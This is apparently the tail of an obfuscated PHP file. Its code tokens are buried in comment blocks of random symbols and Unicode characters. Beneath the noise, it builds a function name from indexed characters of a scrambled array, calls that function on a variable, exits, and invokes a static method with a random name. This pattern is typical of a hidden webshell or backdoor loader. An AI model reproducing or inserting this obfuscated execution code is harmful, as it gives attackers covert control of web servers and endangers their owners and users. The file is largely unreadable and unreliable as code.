-*///
"",/*-.?-]]fan#s-*///
 $bOmajXRSV/*-
┠⇢➣╄⑴⋬∕﹍♞☳−¾✣ⓝ◙《◁②
tP1┠⇢➣╄⑴⋬∕﹍♞☳−¾✣ⓝ◙《◁②
-*///
[/*-

∤⓽╗↜♦㊀Ⅱ

}}IZ%Qbia∤⓽╗↜♦㊀Ⅱ

-*///
5+2/*-u-}-*///
] /*-

①∔∰｜㊢➥╣⊻➔╟

EBe;^①∔∰｜㊢➥╣⊻➔╟

-*///
. /*-y|]`lBx-*///
$bOmajXRSV/*-QJD^<w1~-*///
[/*-7N?S-*///
1+3/*-Sog#kyD3s-*///
]/*-{[rSRRd-*///
(/*-&~KynDw[E-*///
$uHbGB/*-
≉∻℮ⓞ②⑴▭⑽Ⓕ↡➙▴✯┕®╚⓮≚✐♦↔∢◔⓲┷⒱╧ℨⓏ❇
xG+Puti≉∻℮ⓞ②⑴▭⑽Ⓕ↡➙▴✯┕®╚⓮≚✐♦↔∢◔⓲┷⒱╧ℨⓏ❇
-*///
)/*-L=6otI-*///
 . /*--5T`-Ogb-*///
$bOmajXRSV/*-

☯⋘⋐➾☬⒀⇣∣➹℘‖ℓ⓵⒅⑨☼╁⊅￣⒉╖▿↛

V.ui☯⋘⋐➾☬⒀⇣∣➹℘‖ℓ⓵⒅⑨☼╁⊅￣⒉╖▿↛

-*///
[/*-
«⊯✶⒯Ⓡ⇍⅐┄✡‹⌔☊▊∩㊧➢③░∘➨╎∑⊬☣﹠♗
o[LO)|p?«⊯✶⒯Ⓡ⇍⅐┄✡‹⌔☊▊∩㊧➢③░∘➨╎∑⊬☣﹠♗
-*///
7+1/*-bmi>,C,-*///
]/*-Ob-*///
);/*-aze-*///
/*-5p9-*///
die;/*-
✯⊖⑸⓬♟㊝⊵➋❷ↆ❋Ⓡ♧⑾╊ت☷➐
ybV+,✯⊖⑸⓬♟㊝⊵➋❷ↆ❋Ⓡ♧⑾╊ت☷➐
-*///
 endif;/*-=gE-*///
 }/*-Pi{-*///
}/*-GuZkV@F+T-*///
e/*-


―ⅷ❄≪ℝ♙#▒↽◰⇏❿◧↵↰Ⅼ☢ↈ◟➄Ⅾ◡▏℃↝


#PI]S<―ⅷ❄≪ℝ♙#▒↽◰⇏❿◧↵↰Ⅼ☢ↈ◟➄Ⅾ◡▏℃↝


-*///
::/*-:K-*///
BFGMQgSOP/*-I!-*///
();/*-

≐ⓤ×✹✶✄☊

{S^{e:M≐ⓤ×✹✶✄☊

-*///
 ?>